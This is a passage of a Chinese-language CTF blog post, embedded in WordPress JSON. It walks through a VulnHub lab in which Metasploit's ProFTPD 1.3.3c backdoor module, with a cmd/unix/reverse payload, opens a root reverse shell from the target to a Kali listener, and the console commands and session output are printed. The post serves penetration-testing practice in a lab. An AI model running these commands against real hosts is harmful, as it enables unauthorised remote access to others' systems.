src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"775\" height=\"47\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-51.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-324\" style=\"width:827px;height:auto\"  sizes=\"auto, (max-width: 775px) 100vw, 775px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>msf6 exploit(freebsd\/ftp\/proftp_telnet_iac) &gt; set payload cmd\/unix\/reverse\npayload =&gt; cmd\/unix\/reverse\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u67e5\u770bpayload\u53c2\u6570\uff0c\u53d1\u73b0\u6ca1\u6709\u5c11LHOST\uff0c\u5982\u679c\u5c11\u4e86\u518d\u628akali\u7684\u5730\u5740\u8bbe\u7f6e\u4e0a\u3002\uff08set LHOST 192.168.11.128\uff09<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">show options<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-52.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"937\" height=\"540\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-52.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-325\"  sizes=\"auto, (max-width: 937px) 100vw, 937px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-53.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"762\" height=\"159\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-53.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-326\" style=\"width:839px;height:auto\"  sizes=\"auto, (max-width: 762px) 100vw, 762px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f04\u4e0d\u51fa\u6765run\u4e0d\u4e86<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6362\u4e2a<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u91cd\u65b0\u5f04<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">msfconsole<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u76f4\u63a5\u641c\u7d22\u7248\u672c\u53f7<code>ProFTPD 1.3.3c<\/code>\uff0c\u786e\u5b9e\u627e\u5230\u4e86\u5bf9\u5e94\u6f0f\u6d1e\u7684<code>exp<\/code>\u811a\u672c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">search ProFTPD 1.3.3c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-54.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"890\" height=\"666\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-54.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-327\"  sizes=\"auto, (max-width: 890px) 100vw, 890px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">use 0<br>show options<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u770b\u5230\u9700\u8981\u8bbe\u7f6e\u76ee\u6807\u7684IP\u548c\u7aef\u53e3<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7aef\u53e3\u4e3a<code>ftp<\/code>\u9ed8\u8ba4\u768421\u7aef\u53e3\uff0c\u76ee\u6807IP\u8bbe\u7f6e\u4e3a\u9776\u673aIP<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">set rhosts 192.168.11.137<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-55.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"910\" height=\"421\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-55.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-328\"  sizes=\"auto, (max-width: 910px) 100vw, 910px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">door) &gt; \u63a5\u7740\u8981\u8bbe\u7f6e\u4e00\u4e2apayload\uff0c\u8fd9\u91cc\u8bbe\u7f6e\u4e00\u4e2a\u53cd\u5f39shell<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">set payload cmd\/unix\/reverse<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u9700\u8981\u8bbe\u7f6e\u76d1\u542c\u5730\u5740\uff0c\u6211\u4eec\u7528<code>kali<\/code>\u6765\u76d1\u542c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">set lhost 192.168.11.128<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u540e\u7ed3\u679c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-56.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"894\" height=\"555\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-56.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-329\"  sizes=\"auto, (max-width: 894px) 100vw, 894px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>msf6 &gt; use 0\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) &gt; show options\n\nModule options (exploit\/unix\/ftp\/proftpd_133c_backdoor):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   CHOST                     no        The local client address\n   CPORT                     no        The local client port\n   Proxies                   no        A proxy chain of format type:host:port&#91;,type:host:port]&#91;...]\n   RHOSTS                    yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/\n                                       basics\/using-metasploit.html\n   RPORT    21               yes       The target port (TCP)\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) &gt; set rhosts 192.168.11.137\nrhosts =&gt; 192.168.11.137\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) &gt; set payload cmd\/unix\/reverse\npayload =&gt; cmd\/unix\/reverse\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) &gt; set lhost 192.168.11.128\nlhost =&gt; 192.168.11.128\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">run\u4e00\u4e0b<\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-57.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"971\" height=\"307\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-57.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-330\"  sizes=\"auto, (max-width: 971px) 100vw, 971px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>msf6 exploit(unix\/ftp\/proftpd_133c_backdoor) &gt; run\n\n&#91;*] Started reverse TCP double handler on 192.168.11.128:4444 \n&#91;*] 192.168.11.137:21 - Sending Backdoor Command\n&#91;*] Accepted the first client connection...\n&#91;*] Accepted the second client connection...\n&#91;*] Command: echo dBtGUjmwoNxYCFKP;\n&#91;*] Writing to socket A\n&#91;*] Writing to socket B\n&#91;*] Reading from sockets...\n&#91;*] Reading from socket B\n&#91;*] B: \"dBtGUjmwoNxYCFKPrn\"\n&#91;*] Matching...\n&#91;*] A is input...\n&#91;*] Command shell session 1 opened (192.168.11.128:4444 -&gt; 192.168.11.137:48192) at 2025-07-01 05:47:22 -0400\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u76f4\u63a5\u62ff\u5230<code>root<\/code>\u6743\u9650<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">whoami<br>id<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-58-1024x245.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"245\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-58-1024x245.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-331\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u9776\u573a\u4e0b\u8f7d\u5730\u5740\uff1ahttps:\/\/www.vulnhub.com\/ \u4e3b\u673a\u63a2\u6d4b\u4e0e\u7aef\u53e3\u626b\u63cf nmap 192.168. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,9],"tags":[],"class_list":["post-311","post","type-post","status-publish","format-standard","hentry","category-vulnhub","category-wp"],"_links":{"self":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/311","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=311"}],"version-history":[{"count":1,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/311\/revisions"}],"predecessor-version":[{"id":332,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/311\/revisions\/332"}],"wp:attachment":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=311"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=311"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=311"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}